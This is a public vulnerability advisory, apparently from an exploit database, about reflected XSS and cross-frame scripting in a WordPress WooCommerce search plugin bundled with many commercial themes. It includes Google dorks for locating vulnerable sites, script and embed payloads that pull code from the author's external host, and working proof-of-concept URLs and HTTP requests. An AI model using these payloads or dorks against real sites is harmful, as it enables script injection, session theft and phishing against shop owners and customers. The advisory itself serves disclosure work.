SW Ajax WooCommerce Search plugin v1.2.6 - Unauthenticated Reflected XSS & XFS

2020.11.12
ru Ex.Mi (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

[+] :: Exploit Title: SW Ajax WooCommerce Search plugin v1.2.6 - Unauthenticated Reflected XSS & XFS [+] :: Google Dork: inurl:/wp-content/plugins/sw_ajax_woocommerce_search/ [+] :: Date: 2020-10-21 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: MagenTech | WPThemeGo [ https://www.magentech.com | http://www.wpthemego.com ] [+] :: Software Version: 1.2.6 [+] :: Software Link: https://wpthemego.com/document/documentation-for-sw-ajax-woocommerce-search/ [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79, CWE-1021 [i] :: Info: An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the SW Ajax WooCommerce Search plugin v1.2.6 for WordPress. The plugin comes with a number of commercial themes such as: OneMall, Revo, eMarket, Autusin, Market, MaxShop, ShoppyStore, Furnicom, EtroStore, HiTheme, StyleShop, TopDeal, Victo, Avesa, Soaz, Binace, Houskit, Gaion, Furniki, Rozy, SecretSho, BosMarket, Siezz, HiStore, Ecomart, iMarket, NeoMarket, 9Merry, LeVogue, Floris, Alishop, KONStore, ShopyMall, DresShop, Shop4U, FurniHome, Tech8. [!] :: Affected Themes (from ThemeForest): OneMall [ https://themeforest.net/item/onemall-the-multipurpose-ecommerce-marketplace-wordpress-theme/20685400 ] Revo [ https://themeforest.net/item/revo-multipurpose-responsive-woocommerce-theme/18276186 ] eMarket [ https://themeforest.net/item/emarket-multipurpose-woocommerce-wordpress-theme/20492674 ] Autusin [ https://themeforest.net/item/autusin-auto-parts-equipments-woocommerce-theme/22681468 ] Market [ https://themeforest.net/item/market-responsive-woocommerce-wordpress-theme/9514470 ] MaxShop [ https://themeforest.net/item/maxshop-responsive-wordpress-woocommerce-theme/11452732 ] ShoppyStore [ https://themeforest.net/item/shoppystore-woocommerce-wordpress-theme/13607293 ] Furnicom [ https://themeforest.net/item/furnicom-responsive-furniture-woocommerce-wordpress-theme/15548234 ] EtroStore [ https://themeforest.net/item/etrostore-multipurpose-responsive-woocommerce-wordpress-theme/19250849 ] HiTheme [ https://themeforest.net/item/hitheme-responsive-woocommerce-wordpress-theme/19618312 ] StyleShop [ https://themeforest.net/item/styleshop-multipurpose-responsive-woocommerce-theme/19680545 ] TopDeal [ https://themeforest.net/item/topdeal-responsive-woocommerce-wordpress-theme/20308469 ] Victo [ https://themeforest.net/item/victo-ecommerce-marketplace-wordpress-theme/20728619 ] Avesa [ https://themeforest.net/item/avesa-beauty-store-woocommerce-wordpress-theme/25696718 ] Soaz [ https://themeforest.net/item/soaz-furniture-store-wordpress-woocommerce-theme/23858298 ] Binace [ https://themeforest.net/item/binace-fashion-shop-wordpress-woocommerce-theme/22953765 ] Houskit [ https://themeforest.net/item/houskit-interior-design-furniture-store-wordpress-theme/23527677 ] Gaion [ https://themeforest.net/item/gaion-sport-accessories-shop-wordpress-woocommerce-theme/23068764 ] Furniki [ https://themeforest.net/item/furniki-furniture-store-interior-design-wordpress-theme/22846033 ] Rozy [ https://themeforest.net/item/rozy-flower-shop-woocommerce-theme/22640923 ] SecretSho [ https://themeforest.net/item/secretsho-fashion-marketplace-wordpress-theme/22058416 ] BosMarket [ https://themeforest.net/item/bosmarket-flexible-multivendor-woocommerce-wordpress-theme/21207492 ] Siezz [ https://themeforest.net/item/siezz-modern-multipurpose-marketplace-wordpress-theme/21204130 ] HiStore [ https://themeforest.net/item/histore-clean-ecommerce-marketplace-wordpress-theme/20906824 ] [!] :: Affected Themes (from WPThemeGo): iMarket [ https://wpthemego.com/item/imarket-creative-gift-shop-woocommerce-wordpress-theme/ ] NeoMarket [ https://wpthemego.com/item/neomarket-modern-multi-vendor-woocommerce-wordpress-theme/ ] EcoMart [ https://wpthemego.com/item/ecomart-organic-food-store-woocommerce-wordpress-theme/ ] 9Merry [ https://wpthemego.com/item/9merry-christmas-gifts-woocommerce-wordpress-theme/ ] LeVogue [ https://wpthemego.com/item/levogue-fashion-shop-woocommerce-wordpress-theme/ ] Floris [ https://wpthemego.com/item/floris-flower-shop-woocommerce-wordpress-theme/ ] Alishop [ https://wpthemego.com/item/alishop-responsive-woocommerce-wordpress-theme/ ] KONStore [ https://wpthemego.com/item/konstore-bridal-shop-woocommerce-wordpress-theme/ ] ShopyMall [ https://wpthemego.com/item/shopymall-multi-vendor-marketplace-woocommerce-wordpress-theme/ ] DresShop [ https://wpthemego.com/item/dresshop-fashion-shop-woocommerce-wordpress-theme/ ] Shop4U [ https://wpthemego.com/item/shop4u-modern-marketplace-woocommerce-wordpress-theme/ ] FurniHome [ https://wpthemego.com/item/furnihome-furniture-store-woocommerce-wordpress-theme/ ] Tech8 [ https://wpthemego.com/item/tech8-digital-store-woocommerce-wordpress-theme/ ] [%] :: Google Dorks: /wp-content/themes/onemall/ /wp-content/themes/revo/ /wp-content/themes/emarket/ /wp-content/themes/autusin/ /wp-content/themes/market/ /wp-content/themes/maxshop/ /wp-content/themes/shoppystore/ /wp-content/themes/furnicom/ /wp-content/themes/etrostore/ /wp-content/themes/hitheme/ /wp-content/themes/styleshop/ /wp-content/themes/topdeal/ /wp-content/themes/victo/ /wp-content/themes/avesa/ /wp-content/themes/soaz/ /wp-content/themes/binace/ /wp-content/themes/houskit/ /wp-content/themes/gaion/ /wp-content/themes/furniki/ /wp-content/themes/rozy/ /wp-content/themes/secretsho/ /wp-content/themes/bosmarket/ /wp-content/themes/siezz/ /wp-content/themes/histore/ /wp-content/themes/ecomart/ /wp-content/themes/imarket/ /wp-content/themes/neomarket/ /wp-content/themes/9merry/ /wp-content/themes/levogue/ /wp-content/themes/floris/ /wp-content/themes/alishop/ /wp-content/themes/konstore/ /wp-content/themes/shopymall/ /wp-content/themes/dresshop/ /wp-content/themes/shop4u/ /wp-content/themes/furnihome/ /wp-content/themes/tech8/ [$] :: Payloads: "><script src="https://ex-mi.ru/payload/a2r.js"></script> "><embed src="https://ex-mi.ru/payload/xfsii.html"> [!] :: PoC Unauthenticated Reflected XSS: https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product [!] :: PoC Unauthenticated Reflected XSS (Burp Suite): GET /themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1 Host: demo.wpthemego.com [!] :: PoC Unauthenticated XFS: https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E&search_posttype=product [!] :: PoC Unauthenticated XFS (Burp Suite): GET /themes/sw_onemall/layout2/wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E HTTP/1.1 Host: demo.wpthemego.com [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex.mi

References:

https://ex-mi.ru/exploit/[2020-10-21]-[WordPress]-sw-ajax-woocommerce-search-plugin-v1.2.6.txt
https://github.com/ex-mi/ex-mi.github.io/blob/main/exploit/%5B2020-10-21%5D-%5BWordPress%5D-sw-ajax-woocommerce-search-plugin-v1.2.6.txt
https://wpthemego.com/document/documentation-for-sw-ajax-woocommerce-search/


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top